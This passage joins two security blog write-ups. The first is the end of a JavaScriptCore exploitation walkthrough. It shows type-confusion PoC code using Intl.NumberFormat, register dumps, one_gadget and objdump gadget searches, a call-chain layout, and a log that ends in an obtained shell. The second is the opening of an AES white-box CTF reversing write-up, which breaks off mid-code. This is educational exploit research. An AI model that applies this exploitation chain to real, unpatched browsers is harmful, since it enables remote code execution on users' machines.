To save some space: I was unsuccessful at finding any way to turn this fastMalloc overflow into an arbitrary write. At one point I was absolutely convinced I had a method of partially overwriting a SymbolImpl, converting it to a to String, then overwriting that, thus bypassing the flags restriction mentioned earlier... but this didn’t work (I confused JSC::JSString with WTF::StringImpl, amongst other problems).

All the things I could find to overwrite in the fastMalloc heap were either Strings (or String-like things, e.g. Symbols) or were JIT primitives I didn’t want to try to understand. Alternatively I could have tried to target fastMalloc metadata attacks -- for some reason this didn’t occur to me until much later and I haven’t looked at this at all.

Remember when I mentioned the potential downsides of targeting jsc specifically? This is where they start to come into play. It would be really nice at this point to have a richer set of objects to target here, specifically DOM or other browser objects. More objects would give me additional avenues on three fronts: more possibilities to type confuse my existing busted functions, more possibilities to overflow in the fastMalloc heap, and more possibilities to obtain references to useful functions.

At this point I decided to try to find a different chain of functions calls which would use the same bug but give me a reference to a different runtime function.

Control Flow

My general workflow when auditing other functions for our candidate pattern was to look at the code exposed via builtins, find native functions, and then audit those native functions looking for things that had JSValue’s evaluated. While this found other instances of this pattern (e.g. in the RegExp code), they were not usable -- the C++ runtime functions would do additional checks and error out. However when searching, I stumbled onto another p0 bug with the same CVE attributed, p0 bug 1036. Reproducing from the PoC there:

var i = new Intl.DateTimeFormat();
var q;

function f(){
    q = f.caller;
    return 10;
}


i.format({valueOf : f});

q.call(0x77777777);

This bug is very similar to our earlier bug and originally I was confused as to why it was a separate p0 bug. Both bugs manifest in the same way, by giving you a non-properly-typechecked reference to a function, however the root cause that makes the bugs possible is different. In the appendMemcpy case this is due to a lack of checks on use strict code. This appears to be a “regular” type confusion, unrelated to use strict. These bugs, while different, are similar enough that they share a CVE and a fix.

So, with this understood can we use Intl.DateTimeFormat usefully to exploit jsc?

Intl.DateTimeFormat Crash

What’s the outcome if we run that PoC?

Thread 1 "jsc" received signal SIGSEGV, Segmentation fault.
…
$rdi   : 0xffff000077777777
...
 → 0x7ffff77a8960 <JSC::IntlDateTimeFormat::format(JSC::ExecState&,+0> cmp    BYTE PTR [rdi+0x18], 0x0

Ok, so we’re treating a NaN boxed integer as an object. What if we pass it an object instead?

// ...
q.call({a: new Int64('0x41414141')});

Results in:

Thread 1 "jsc" received signal SIGSEGV, Segmentation fault.
...
$rdi   : 0x0000000000000008
 ...
 → 0x7ffff77a4833 <JSC::IntlDateTimeFormat::initializeDateTimeFormat(JSC::ExecState&,+0> mov    eax, DWORD PTR [rdi]

Hmm.. this also doesn’t look immediately useful. As a last ditch attempt, reading the docs we notice there is a both an Intl.DateTimeFormat and an Intl.NumberFormat with a similar format call. Let’s try getting a reference to that function instead:

load('utils.js')
load('int64.js');

var i = new Intl.NumberFormat();
var q;

function f(){
        q = f.caller;
        return 10;
}


i.format({valueOf : f});

q.call({a: new Int64('0x41414141')});

Giving us:

Thread 1 "jsc" received signal SIGSEGV, Segmentation fault.
…
$rax   : 0x0000000041414141
…
 → 0x7ffff4b7c769 <unum_formatDouble_57+185> call   QWORD PTR [rax+0x48]

Yeah, we can probably exploit this =p

I’d like to say that finding this was due to a deep reading and understanding of WebKit’s internationalization code, but really I was just trying things at random until something crashed in a useful looking state. I’m sure I tried dozens of other things that didn’t end up working out along the way... From a pedagogical perspective, I’m aware that listing random things I tried is not exactly optimal, but that’s actually how I did it so :)

Exploit Planning

Let’s pause to take stock of where we’re at:

  • We have an arbitrary infoleak
  • We have a relative write and no good way to expand it to an arbitrary write
  • We have control over the program counter

Using the infoleak we can find pretty much anything we want, thanks to linux loader behavior (libc.so.6 and thus system() will always be at a fixed offset from libJavaScriptCore.so which we already have the base address of leaked). A “proper” exploit would take a arbitrary shellcode and result in it’s execution, but we can settle with popping a shell.

The ideal case here would be we have control over rdi and can just point rip at system() and we’d be done. Let’s look at the register state where we hijack control flow, with pretty printing from @_hugsy’s excellent gef.

$rax   : 0x0000000041414141
$rbx   : 0x0000000000000000
$rcx   : 0x00007fffffffd644  →  0xb2de45e000000000
$rdx   : 0x00007fffffffd580  →  0x00007ffff4f14d78  →  0x00007ffff4b722d0  →  <icu_57::FieldPosition::~FieldPosition()+0> lea rax, [rip+0x3a2a91]        # 0x7ffff4f14d68 <_ZTVN6icu_5713FieldPositionE>
$rsp   : 0x00007fffffffd570  →  0x7ff8000000000000
$rbp   : 0x00007fffffffd5a0  →  0x00007ffff54dfc00  →  0x00007ffff51f30e0  →  <icu_57::UnicodeString::~UnicodeString()+0> lea rax, [rip+0x2ecb09]        # 0x7ffff54dfbf0 <_ZTVN6icu_5713UnicodeStringE>
$rsi   : 0x00007fffffffd5a0  →  0x00007ffff54dfc00  →  0x00007ffff51f30e0  →  <icu_57::UnicodeString::~UnicodeString()+0> lea rax, [rip+0x2ecb09]        # 0x7ffff54dfbf0 <_ZTVN6icu_5713UnicodeStringE>
$rdi   : 0x00007fffb2d5c120  →  0x0000000041414141 ("AAAA"?)
$rip   : 0x00007ffff4b7c769  →  <unum_formatDouble_57+185> call QWORD PTR [rax+0x48]
$r8    : 0x00007fffffffd644  →  0xb2de45e000000000
$r9    : 0x0000000000000000
$r10   : 0x00007ffff35dc218  →  0x0000000000000000
$r11   : 0x00007fffb30065f0  →  0x00007fffffffd720  →  0x00007fffffffd790  →  0x00007fffffffd800  →  0x00007fffffffd910  →  0x00007fffb3000000  →  0x0000000000000003
$r12   : 0x00007fffffffd644  →  0xb2de45e000000000
$r13   : 0x00007fffffffd660  →  0x0000000000000000
$r14   : 0x0000000000000020
$r15   : 0x00007fffb2d5c120  →  0x0000000041414141 ("AAAA"?)

So, rax is fully controlled and rdi and r15 are pointers to rax. Nothing else seems particularly useful. The ideal case is probably out, barring some significant memory sprays to get memory addresses that double as useful strings. Let’s see if we can do it without rdi.

one_gadget

On linux, there is a handy tool for this by @david924j called one_gadget. one_gadget is pretty straightforward in its use: you give it a libc, it gives you the offsets and constraints for PC values that will get you a shell. In my case:

x@webkit:~$ one_gadget /lib/x86_64-linux-gnu/libc.so.6
0x41bce execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x41c22 execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xe1b3e execve("/bin/sh", rsp+0x60, environ)
constraints:
  [rsp+0x60] == NULL

So, we have three constraints, and if we can satisfy any one of them, we’re done. Obviously the first is out -- we take control of PC with a call [rax+0x48] so rax cannot be NULL. So, now we’re looking at stack contents. Because nothing is ever easy, neither of the stack based constraints are met either. Since the easy solutions are out, let’s look at what we have in a little more detail.

Memory layout and ROP

       +------------------+
rax -> |0xdeadbeefdeadbeef|
       +------------------+
       |        ...       |
       +------------------+
+0x48  |0x4141414141414141| <- new rip
       +------------------+

To usefully take control of execution, we will need to construct an array with our target PC value at offset +0x48, then call our type confusion with that value. Because we can construct ArrayWithDouble’s arbitrary, this isn’t really a problem: populate the array, use our infoleak to find the array base, use that as the type confusion value.

A normal exploit path in this case will focus on getting a stack pivot and setting up a rop chain. In our case, if we wanted to try this the code we would need would be something like:

mov X, [rdi] ; or r15
mov Y, [X]
mov rsp, Y
ret

Where X and Y can be any register. While some code with these properties likely exists inside some of the mapped executable code in our address space, searching for it would require some more complicated tooling than I was familiar with or felt like learning. So ROP is probably out for now.

Reverse gadgets

By this point we are very familiar with the fact that WebKit is C++, and C++ famously makes heavy use of function indirection much to the despair of reverse engineers and glee of exploit writers. Normally in a ROP chain we find snippets of code and chain them together, using ret to transfer control flow between them but that won’t work in this case. However, what if we could leverage C++’s indirection to get us the ability to execute gadgets. In our specific current case, we’re taking control of PC on a call [rax + 0x48], with a fully controlled rax. Instead of looking for gadgets that end in ret, what if we look for gadgets that end in call [rax + n] and stitch them together.

x@webkit:~$ objdump -M intel -d ~/WebKit/WebKitBuild/Release/lib/libJavaScriptCore.so \
    | grep 'call   QWORD PTR \[rax' \
    | wc -l
7214

7214 gadgets is not a bad playground to choose from. Obviously objdump is not the best disassembler for this as it won’t find all instances (e.g. overlapping/misaligned instructions), but it should be good enough for our purposes. Let’s combine this idea with one_gadget constraints. We need a series of gadgets that:

  • Zero a register
  • Write that register to [rsp+0x28] or [rsp+0x58]
  • All of which end in a call [rax+n], with each n being unique

Why +0x28 or +0x58 instead of +0x30 or +0x60 like one_gadget’s output? Because the the final call into one_gadget will push the next PC onto the stack, offsetting it by 8. With a little bit of grepping, this was surprisingly easy to find. We’re going to search backwards, first, let’s go for the stack write.

x@webkit:~$ objdump -M intel -d ~/WebKit/WebKitBuild/Release/lib/libJavaScriptCore.so \
    | grep -B1 'call   QWORD PTR \[rax' \
    | grep -A1 'mov    QWORD PTR \[rsp+0x28\]'
...
  5f6705:       4c 89 44 24 28          mov    QWORD PTR [rsp+0x28],r8
  5f670a:       ff 50 60                call   QWORD PTR [rax+0x60]
...

This find us four unique results, with the one we’ll use being the only one listed. Cool, now we just need to find a gadget to zero r8...

x@webkit:~$ objdump -M intel -d ~/WebKit/WebKitBuild/Release/lib/libJavaScriptCore.so \
    | grep -B4 'call   QWORD PTR \[rax' \
    | grep -A4 'xor    r8'
…
  333503:       45 31 c0                xor    r8d,r8d
  333506:       4c 89 e2                mov    rdx,r12
  333509:       48 89 de                mov    rsi,rbx
  33350c:       ff 90 f8 00 00 00       call   QWORD PTR [rax+0xf8]
...

For this one, we need to broaden our search a bit, but still find what we need without too much trouble (and have our choice of five results, again with the one we’ll use being the only one listed). Again, objdump and grep are not the best tool for this job, but if it’s stupid and it works…

One takeaway from this section is that libJavaScriptCore is over 12mb of executable code, and this means your bigger problem is figuring what to look for as opposed to finding it. With that much code, you have an embarrassment of useful gadgets. In general, it made me curious as to the practical utility of fancy gadget finders on larger binaries (at least in case where the payloads don’t need to be dynamically generated).

In any case, we now have all the pieces we need to trigger and land our exploit.

Putting it all together

To finish this guy off, we need to construct our pseudo jump table. We know we enter into our chain with a call [rax+0x48], so that will be our first gadget, then we look at the offset of the call to determine the next one. This gives us a layout like this:

       +------------------+
rax -> |0xdeadbeefdeadbeef|
       +------------------+
       |       ...        |
       +------------------+
+0x48  |     zero r8      | <- first call, ends in call [rax+0xf8]
       +------------------+
       |       ...        |
       +------------------+
+0x60  |    one gadget    | <- third call, gets us our shell
       +------------------+
       |       ...        |
       +------------------+
+0xf8  |    write stack   | <- second call, ends in call [rax+0x60]
       +------------------+

We construct this array using normal JS, then just chase pointers from leaks we have until we find the array. In my implementation I just used a magic 8 byte constant which I searched for, effectively performing a big memmem() on the heap. Once it’s all lined up, the dominoes fall and one_gadget gives us our shell :)

x@webkit:~/babys-first-webkit$ ./jsc zildjian.js
setting up ghetto_memcpy()...
done:
function () {
    [native code]
}

setting up read primitives...
done.

leaking string addr...
string @ 0x00007feac5b96814

leaking jsc base...
reading @ 0x00007feac5b96060
libjsc .data leak: 0x00007feaca218f28
libjsc .text @ 0x00007feac95e8000
libc @ 0x00007feac6496000
one gadget @ 0x00007feac64d7c22

leaking butterfly arena...
reading @ 0x00007feac5b95be8
buttefly arena leak: 0x00007fea8539eaa0

searching for butterfly in butterfly arena...
butterfly search base: 0x00007fea853a8000
found butterfly @ 0x00007fea853a85f8

replacing array search tag with one shot gadget...
setting up take_rip...
done:
function format() {
    [native code]
}
setting up call target: 0x00007fea853a85b0
getting a shell... enjoy :)
$ id
uid=1000(x) gid=1000(x) groups=1000(x),27(sudo)

The exploit is here: zildjian.js. Be warned that while it seems to be 100% deterministic, it is incredibly brittle and includes a bunch of offsets that are specific to my box. Instead of fixing the exploit to make it general purpose, I opted to provide all the info for you to do it yourself at home :)

If you have any questions, or if you have suggestions for better ways to do anything, be it exploit specifics or general approaches please (really) drop me a line on Twitter or IRC. As the length of this article might suggest, I’m happy to discuss this to death, and one of my hopes in writing this all down is that someone will see me doing something stupid and correct me.

Conclusion

With the exploit working, let’s reflect on how this was different from common CTF problems. There are two difference which really stand out to me:

  • The bug is more subtle than a typical CTF problem. This makes sense, as CTF problems are often meant to be understood within a ~48 hour period, and when you can have bigger/more complex systems you have more opportunity for mistakes like these.
  • CTF problems tend to scale up difficulty by giving worse exploit primitives, rather than harder bugs to find. We’ve all seen contrived problems where you get execution control in an address space with next to nothing in it, and need to MacGyver your way out. While this can be a fun and useful exercise, I do wish there were good ways to include the other side of the coin.

Some final thoughts:

  • This was significantly harder than I expected. I went in figuring I would have some fairly localized code, find a heap smash, relative write, or UaF and be off to the races. While that may be true for some browser bugs, in this case I needed a deeper understanding of browser internals. My suspicion is that this was not the easiest bug to begin browser exploitation with, but on the upside it was very… educational.
  • Most of the work here was done over a ~3 month period in my free time. The initial setup and research to get a working infoleak took just over a month, then I burned over a month trying to find a way to get an arbitrary write out of fastMalloc. Once I switched to Intl.NumberFormat I landed the exploit quickly.
  • I was surprised by how important object layouts were for exploitation, and how relatively poor the tooling was for finding and visualizing objects that could be instantiated and manipulated from the runtime.
  • With larger codebases such as this one, when dealing with an unknown component or function call I had the most consistent success balancing an approach of guessing what I viewed as likely behavior and reading and understanding the code in depth. I found it was very easy to get wrapped up in guessing how something worked because I was being lazy and didn’t want to read the code, or alternatively to end up reading and understanding huge amounts of code that ended up being irrelevant to my goals.

Most of these points boil down to “more code to understand makes it more work to exploit”. Like most problems, once you understand the components the solution is fairly simple. With a larger codebase the most time by far was spent reading and playing with the code to understand it better.

I hope you’ve enjoyed this writeup, it would not have been possible without significant assistance from a bunch of people. Thanks to @natashenka for the bugs, @agustingianni for answering over a million questions, @5elo and @_niklasb for the Phrack article and entertaining my half-drunk questions during CanSec respectively, @0vercl0k who graciously listened to me rant about butterflies at least twenty times, @itszn13 who is definitely the the best RPISEC alumnus of all time, and @mongobug who provided helpful ideas and shamed me into finishing exploit and writeup.

Breaking ledgerctf's AES white-box challenge

Introduction

About a month ago, my mate b0n0n was working on the ledgerctf puzzles and challenged me to have a look at the ctf2 binary. I eventually did and this blogpost discusses the protection scheme and how I broke it. Before diving in though, here is a bit of background.

ledger is a french security company founded in 2014 that is specialized in cryptography, cryptocurrencies, and hardware. They recently put up online three different puzzles to celebrate the official launch of their bug bounty program. The second challenge called ctf2 is the one we will be discussing today. ctf2 is an ELF64 binary that is available here for download (if you want to follow at home). The binary is about 11MB, written in C++ and even has symbols; great.

Let's do it!

The big picture

Recon

The very first thing I'm sure you've noticed how much data is in the binary as seen in the picture below. It means that either the binary is packed and IDA is struggling to recognize pieces of the binary as code, or it is actually real data.

ida.png

As we also already know that the binary hasn't been stripped, the first hypothesis is most likely wrong. By skimming through the code in the disassembler, nothing really stands out; everything looks healthy. No sign of obfuscation, code-encryption or packing of any sorts. At this point we are pretty sure we are looking at a pure reverse-engineering challenge, smooth sailing!

Diffusion

The binary expects a serial as input which is a string composed of 32 hex characters, like this one: 00112233445566778899AABBCCDDEEFF. Then, there is a loop containing 16 rounds that walks the serial character by character and builds 15 blobs, each 16 bytes long; I call them i0, i1, .., i14 (as it's very self explanatory). Each round of this loop initializes one byte of every i's (hence the 16 rounds). The current input serial byte is sent through a huge substitution box (that I called sbx and that it is 11534336 bytes long). This basically diffuses the input serial in those blobs. If the explanation above wasn't clear enough, here is what it looks like in prettyfied C code:

while(Idx < 16) {
  sbx++;
  char CurrentByteString[3] = {
    Serial[Idx],
    Serial[Idx + 1],
    0
  };
  Idx += 2LL;
  uint8_t CurrentByte = strtol(CurrentByteString, 0LL, 16);
  i0[sbx[-1]] = CurrentByte;
  i1[sbx[15]] = CurrentByte;
  i2[sbx[31]] = CurrentByte;
  i3[sbx[47]] = CurrentByte;
  i4[sbx[63]] = CurrentByte;
  i5[sbx[79]] = CurrentByte;
  i6[sbx[95]] = CurrentByte;
  i7[sbx[111]] = CurrentByte;
  i8[sbx[127]] = CurrentByte;
  i9[sbx[143]] = CurrentByte;
  i10[sbx[159]] = CurrentByte;
  i11[sbx[175]] = CurrentByte;
  i12[sbx[191]] = CurrentByte;
  i13[sbx[207]] = CurrentByte;
  i14[sbx[223]] = CurrentByte;
}

Confusion

After the above, there is now a bunch of stuff happening that doesn't necessarily make a whole lot of sense at the moment. As far as I am concerned though, this doesn't concern me yet as I can't see a clear relationship yet with the input serial bytes or the is. As those two are the only user-input derived data, those are the only ones I care about for now.

Next, we hit this code:

do
{
  v16 = v15 + 4;
  do
  {
    rd = rand();
    v18 = (unsigned __int8)(((unsigned __int64)rd >> 56) + rd) - ((unsigned int)(rd >> 31) >> 24);
    mask[v15] = v18;
    mask3[v15] = v18;
    shiftedmask[v15++] = v18;
  }
  while ( v15 != v16 );
}
while ( v15 != 16 );

What I learned from this part is that there are new players in town. Basically, three blobs of 16 bytes, respectively called mask, mask3 and shiftedmask, get initialized with values derived from rand(). At first it sure is a bit confusing to see pseudo-randomized values getting involved but we can assume those operations will get canceled out by some others later. It wouldn't make sense to have some crypto looking algorithm producing non deterministic results. The PRNG is seeded with time(NULL).

After this there are a bunch of other operations that we don't care about. You can just see those as black boxes that generate deterministic outputs. It means we will be able to conveniently dump the generated values whenever needed. For what it's worth, it basically mixes a bunch of values inside mask3.

shiftrows((unsigned __int8 (*)[4])shiftedmask);
shiftrows((unsigned __int8 (*)[4])mask3);
v19 = mul3[(unsigned __int8)byte_D03774] ^ mul2[mask3[0]] ^ byte_D03778 ^ byte_D0377C;
v20 = mul3[(unsigned __int8)byte_D0377C] ^ mul2[(unsigned __int8)byte_D03778] ^ byte_D03774 ^ mask3[0];
v21 = mul3[mask3[0]] ^ mul2[(unsigned __int8)byte_D0377C] ^ byte_D03778 ^ byte_D03774;
byte_D03774 = mul3[(unsigned __int8)byte_D03778] ^ mul2[(unsigned __int8)byte_D03774] ^ mask3[0] ^ byte_D0377C;
mask3[0] = v19;
byte_D03778 = v20;
byte_D0377C = v21;
v22 = mul3[(unsigned __int8)byte_D0377D] ^ mul2[(unsigned __int8)byte_D03779] ^ mask3[1] ^ byte_D03775;
v23 = mul3[(unsigned __int8)byte_D03775] ^ mul2[mask3[1]] ^ byte_D03779 ^ byte_D0377D;
v24 = mul3[mask3[1]] ^ mul2[(unsigned __int8)byte_D0377D] ^ byte_D03779 ^ byte_D03775;
byte_D03775 = mul3[(unsigned __int8)byte_D03779] ^ mul2[(unsigned __int8)byte_D03775] ^ mask3[1] ^ byte_D0377D;
mask3[1] = v23;
byte_D03779 = v22;
byte_D0377D = v24;
v25 = mul3[(unsigned __int8)byte_D0377E] ^ mul2[(unsigned __int8)byte_D0377A] ^ byte_D03776 ^ mask3[2];
v26 = mul3[mask3[2]] ^ mul2[(unsigned __int8)byte_D0377E] ^ byte_D0377A ^ byte_D03776;
v27 = mul3[(unsigned __int8)byte_D03776] ^ mul2[mask3[2]] ^ byte_D0377E ^ byte_D0377A;
byte_D03776 = mul3[(unsigned __int8)byte_D0377A] ^ mul2[(unsigned __int8)byte_D03776] ^ byte_D0377E ^ mask3[2];
byte_D0377A = v25;
byte_D0377E = v26;
mask3[2] = v27;
v28 = mul3[(unsigned __int8)byte_D03777] ^ mul2[mask3[3]] ^ byte_D0377F ^ byte_D0377B;
v29 = mul3[(unsigned __int8)byte_D0377F] ^ mul2[(unsigned __int8)byte_D0377B] ^ byte_D03777 ^ mask3[3];
v30 = mul3[mask3[3]] ^ mul2[(unsigned __int8)byte_D0377F] ^ byte_D0377B ^ byte_D03777;
byte_D03777 = mul3[(unsigned __int8)byte_D0377B] ^ mul2[(unsigned __int8)byte_D03777] ^ byte_D0377F ^ mask3[3];
mask3[3] = v28;
byte_D0377B = v29;
byte_D0377F = v30;
*(__m128i *)mask3 = _mm_xor_si128(_mm_load_si128((const __m128i *)mask), *(__m128i *)mask3);

mul3 and mul2 are basically arrays that have been constructed such as mul2[idx] = idx * 2 and mul3[idx] = idx * 3 within GF(2**8).

const uint8_t mul2[256] {
    0x00, 0x02, 0x04, 0x06, 0x08, 0x0a, 0x0c, 0x0e,
    0x10, 0x12, 0x14, 0x16, 0x18, 0x1a, 0x1c, 0x1e,
    0x20, 0x22, 0x24, 0x26, 0x28, 0x2a, 0x2c, 0x2e,
    0x30, 0x32, 0x34, 0x36, 0x38, 0x3a, 0x3c, 0x3e,
    0x40, 0x42, 0x44, 0x46, 0x48, 0x4a, 0x4c, 0x4e,
    0x50, 0x52, 0x54, 0x56, 0x58, 0x5a, 0x5c, 0x5e,
    0x60, 0x62, 0x64, 0x66, 0x68, 0x6a, 0x6c, 0x6e,
    0x70, 0x72, 0x74, 0x76, 0x78, 0x7a, 0x7c, 0x7e,
    0x80, 0x82, 0x84, 0x86, 0x88, 0x8a, 0x8c, 0x8e,
    0x90, 0x92, 0x94, 0x96, 0x98, 0x9a, 0x9c, 0x9e,
    0xa0, 0xa2, 0xa4, 0xa6, 0xa8, 0xaa, 0xac, 0xae,
    0xb0, 0xb2, 0xb4, 0xb6, 0xb8, 0xba, 0xbc, 0xbe,
    0xc0, 0xc2, 0xc4, 0xc6, 0xc8, 0xca, 0xcc, 0xce,
    0xd0, 0xd2, 0xd4, 0xd6, 0xd8, 0xda, 0xdc, 0xde,
    0xe0, 0xe2, 0xe4, 0xe6, 0xe8, 0xea, 0xec, 0xee,
    0xf0, 0xf2, 0xf4, 0xf6, 0xf8, 0xfa, 0xfc, 0xfe,
    0x1b, 0x19, 0x1f, 0x1d, 0x13, 0x11, 0x17, 0x15,
    0x0b, 0x09, 0x0f, 0x0d, 0x03, 0x01, 0x07, 0x05,
    0x3b, 0x39, 0x3f, 0x3d, 0x33, 0x31, 0x37, 0x35,
    0x2b, 0x29, 0x2f, 0x2d, 0x23, 0x21, 0x27, 0x25,
    0x5b, 0x59, 0x5f, 0x5d, 0x53, 0x51, 0x57, 0x55,
    0x4b, 0x49, 0x4f, 0x4d, 0x43, 0x41, 0x47, 0x45,
    0x7b, 0x79, 0x7f, 0x7d, 0x73, 0x71, 0x77, 0x75,
    0x6b, 0x69, 0x6f, 0x6d, 0x63, 0x61, 0x67, 0x65,
    0x9b, 0x99, 0x9f, 0x9d, 0x93, 0x91, 0x97, 0x95,
    0x8b, 0x89, 0x8f, 0x8d, 0x83, 0x81, 0x87, 0x85,
    0xbb, 0xb9, 0xbf, 0xbd, 0xb3, 0xb1, 0xb7, 0xb5,
    0xab, 0xa9, 0xaf, 0xad, 0xa3, 0xa1, 0xa7, 0xa5,
    0xdb, 0xd9, 0xdf, 0xdd, 0xd3, 0xd1, 0xd7, 0xd5,
    0xcb, 0xc9, 0xcf, 0xcd, 0xc3, 0xc1, 0xc7, 0xc5,
    0xfb, 0xf9, 0xff, 0xfd, 0xf3, 0xf1, 0xf7, 0xf5,
    0xeb, 0xe9, 0xef, 0xed, 0xe3, 0xe1, 0xe7, 0xe5,
};

One thing of interest - maybe - is that there is a small anti-debug in there. The file is opened and read using one of std::vector's constructor that takes an std::ifstreambuf_iterator as input. Some sort of checksum is generated and will be used later in the schedule routine. What this means is that if you were about to patch the binary, the algorithm would end up generating wrong values. Again, this is barely an inconvenience as we can just dump it out and carry on with our lives.

std::basic_ifstream<char,std::char_traits<char>>::basic_ifstream(&v63, *v3, 4LL);
std::vector<unsigned char,std::allocator<unsigned char>>::vector<std::istreambuf_iterator<char,std::char_traits<char>>,void>(
  &v46,
  *(_QWORD **)((char *)&v64 + *(_QWORD *)(v63 - 24)),
  -1,
  0LL,
  -1);
v31 = v46;
if ( (signed int)v47 - (signed int)v46 > 0 )
{
  v32 = 0LL;
  v33 = (unsigned int)(v47 - (_DWORD)v46 - 1) + 1LL;
  do
  {
    v34 = v32 & 0xF;
    v35 = v31[v32++] ^ *((_BYTE *)&crc + v34);
    *((_BYTE *)&crc + v34) = v35;
  }
  while ( v32 != v33 );
}

Generation

At this point, the 15 i's from above are used to initialize what I called s0, s1, ..., s14. Again, it is 15 blobs of 16 bytes each. They are passed to the schedule function that will perform a lot of arithmetic operations on the array of s's. Again, no need to understand schedule just yet; as far as we are concerned it is a black box that takes s's in input and gives us back different s's in output, period.

Each of those 16 bytes (conveniently, XMMs register are 16 bytes long which allows the compiler to optimize the code manipulating those blobs) (s0, ..., s14) are XOR'ed together, and if the resulting xmmword obeys a bunch of constraints then you get the good boy message.

Those constraints look like this:

h1 = mxor.m128i_u8[0] | ((mxor.m128i_u8[4] | ((mxor.m128i_u8[8] | ((mxor.m128i_u8[12] | ((mxor.m128i_u8[1] | ((mxor.m128i_u8[5] | ((mxor.m128i_u8[9] | ((unsigned __int64)mxor.m128i_u8[13] << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) << 8);
h2 = mxor.m128i_u8[2] | ((mxor.m128i_u8[6] | ((mxor.m128i_u8[10] | ((mxor.m128i_u8[14] | ((mxor.m128i_u8[3] | ((mxor.m128i_u8[7] | ((mxor.m128i_u8[11] | ((unsigned __int64)mxor.m128i_u8[15] << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) << 8);
if ( BYTE6(h2) == 'i'
  && BYTE5(h2) == '7'
  && BYTE4(h2) == '\x13'
  && (mxor.m128i_u8[2] | ((mxor.m128i_u8[6] | ((mxor.m128i_u8[10] | ((mxor.m128i_u8[14] | ((mxor.m128i_u8[3] | ((mxor.m128i_u8[7] | ((mxor.m128i_u8[11] | ((unsigned int)mxor.m128i_u8[15] << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) >> 24 == 66
  && (unsigned __int8)((mxor.m128i_u8[2] | ((mxor.m128i_u8[6] | ((mxor.m128i_u8[10] | ((mxor.m128i_u8[14] | ((mxor.m128i_u8[3] | ((mxor.m128i_u8[7] | ((mxor.m128i_u8[11] | ((unsigned int)mxor.m128i_u8[15] << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) >> 16) == 105
  && BYTE1(h2) == 55
  && mxor.m128i_i8[2] == 19
  && HIBYTE(h1) == 66
  && BYTE6(h1) == 105
  && BYTE5(h1) == 55
  && BYTE4(h1) == 19
  && (mxor.m128i_u8[0] | ((mxor.m128i_u8[4] | ((mxor.m128i_u8[8] | ((mxor.m128i_u8[12] | ((mxor.m128i_u8[1] | ((mxor.m128i_u8[5] | ((mxor.m128i_u8[9] | ((unsigned int)mxor.m128i_u8[13] << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) >> 24 == 66
  && (unsigned __int8)((mxor.m128i_u8[0] | ((mxor.m128i_u8[4] | ((mxor.m128i_u8[8] | ((mxor.m128i_u8[12] | ((mxor.m128i_u8[1] | ((mxor.m128i_u8[5] | ((mxor.m128i_u8[9] | ((unsigned int)mxor.m128i_u8[13] << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) >> 16) == 105
  && BYTE1(h1) == 55
  && mxor.m128i_i8[0] == 19
  && h2 >> 56 == 66 )
{
  puts("**** Login Successful ****");
  v42 = 0;
}
else
{
  puts("**** Login Failed ****");
  v42 = 1;
}

This garbage simply translates to win = (mxor == 0x42424242696969693737373713131313ULL) :).

Zooming in

It is now a good time to zoom in and get our hands dirty a little. We sort of know what we need to achieve, but we are unsure of how to get there. We know we have some dumping to do: mask, mask3, shiftedmask, crc, sbx, mul2 and mul3. Easy. Mechanical.

The most important outstanding unknown part is to understand a bit more of schedule. You can consider it as the heart of the challenge. So let's do that.

schedule

At first sight, the function doesn't look too bad which is always nice. The first part of the function is randomly selecting one of the s's variable (the variable i is used to index into the states array where all the s's are).

for(i = rand() % 15; scheduling[i] == 40; i = rand() % 15);
nround = scheduling[i];

The switch case that follows applies one type of transformation (arithmetic ones) on the chosen s variable. In order to track the number of rounds already applied to each s's variables, an array called scheduling is used. The algorithm stops when forty rounds have been applied to every s's. It's also worth to point out that there's a small anti-debugging here; a timer is started at the beginning (t1) of the round and stopped at the end (t2). If any abnormal delay between t1 and t2 is discovered the later computations will produce wrong results.

We can observe 6 different type of operations in the switch case. Some of them look very easily invertible and some others would need some more work. But at this point, it reminds me a lot of this AES whitebox I analyzed back in 2013. This one doesn't have any obfuscation which makes it much easier to deal with. What I did at the time was pretty simple: divide and conquer. I broke down each round in four pieces. Each of those quarter round worked as a black box function that took 4 bytes of input and generated 4 bytes of output (as a result each round would generate 16 bytes/128bits). I needed to find the 4 bytes of input that would give me the 4 bytes of output I wanted. Solving those quarters could be done simultaneously and starting from the desired output you could go walk back from round N to round N-1. That was basically my plan for ctf2.

At this point I already had ripped out the schedule function to my own program. I cleaned-up the code and made sure it produced the same results as the program itself (always fun to debug). In other words, I was ready to go forward with the analysis of all the arithmetic rounds.

case 0: encoding

This case is as simple as it gets as you can see below:

case 0:
  s0[i] = _mm_xor_si128(_mm_load_si128(&s0[i]), *(__m128i *)mask);
  break;

As a result, inverting it is a simple XOR operation:

void reverse_0(Slot_t &Output, Slot_t &Input) {
    Input = _mm_xor_si128(_mm_load_si128(&Output), mask);
}

case 1, 5, 9, 13, 17, 21, 25, 29, 33, 37: SubBytes

This case can look a bit more intimidating compared to the previous one (lol). Here is how it looks like once I have cleaned and prettified it a bit:

case 1:
case 5:
case 9:
case 13:
case 17:
case 21:
case 25:
case 29:
case 33:
case 37: {
    v54 = nround >> 2;
    v55 = Slot->m128i_u8[0];
    v77.m128i_u64[0] = mask.m128i_u8[0];
    v56 = v54;
    v54 <<= 20;
    v79 = mask.m128i_u8[1];
    v81 = mask.m128i_u8[2];
    v57 = &sboxes[256 * (v55 + (v56 << 12))];
    v58 = Slot->m128i_u8[1];
    v80 = &sboxes[256 * v58 + v54];
    v60 = Slot->m128i_u8[2];
    v61 = &sboxes[256 * v60 + v54];
    v62 = Slot->m128i_u8[3];
    v83 = &sboxes[256 * v62 + v54];
    v64 = Slot->m128i_u8[4];
    v84 = &sboxes[256 * v64 + v54];
    v65 = Slot->m128i_u8[6];
    v85 = &sboxes[256 * uint64_t(Slot->m128i_u8[5]) + v54];
    v66 = &sboxes[256 * v65 + v54];
    v67 = Slot->m128i_u8[7];
    v68 = &sboxes[256 * v67 + v54];
    v69 = Slot->m128i_u8[8];
    v88 = mask.m128i_u8[8];
    v89 = &sboxes[256 * v69 + v54];
